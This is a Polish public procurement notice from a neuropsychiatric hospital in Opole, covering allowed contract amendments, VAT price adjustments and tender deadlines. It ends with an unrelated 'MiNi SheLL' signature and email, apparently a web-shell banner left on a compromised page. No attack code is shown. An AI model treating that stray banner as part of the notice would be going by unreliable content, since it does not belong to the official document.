<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór  umowy  stanowi odpowiednio załącznik  nr 2 do SIWZ.
2.	Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:
a)	 zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno-prawnej, przekształceniem lub połączeniem  z inną firmą.
b)	zmiany terminu realizacji umowy określonego w rozdz. II ust. 1 SIWZ  w przypadku niezrealizowania maksymalnej ilości asortymentu określonego w załączniku 1A do umowy o prognozowany czas realizacji całości przedmiotu umowy nie dłużej jednak niż o maksymalnie do 12  miesięcy.
3.	Zmiana umowy wymaga formy pisemnej pod rygorem nieważności.
4.	Zmiana terminu realizacji umowy określona w ust. 2  lit. b) wymaga dodatkowo zgody każdej ze stron umowy.
5.	Wykonawca  gwarantuje stałość cen jednostkowych netto przez cały okres obowiązywania umowy. Ewentualna zmiana ceny brutto może nastąpić w przypadku:
a)	zmiany stawki podatku VAT proporcjonalnie do tej zmiany. Wprowadzenie nowych cen brutto z uwagi na zaistnienie niniejszej okoliczności wymaga niezwłocznego pisemnego zawiadomienia Zamawiającego  poprzez przesłanie załącznika nr 1A zawierającego wskazanie nowych cen brutto. Zawiadomienie to nie stanowi zmiany umowy, w konsekwencji czego nie winno mieć charakteru aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszn.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Zespół Neuropsychiatryczny im. św. Jadwigi ul. Wodociągowa 4, 45-221 Opole..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2016 godzina 09:00, miejsce: Oferty należy składać w Sekretariacie Wojewódzkiego Specjalistycznego Zespołu Neuropsychiatrycznego im. św. Jadwigi ul. Wodociągowa 4, 45-221 Opole..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com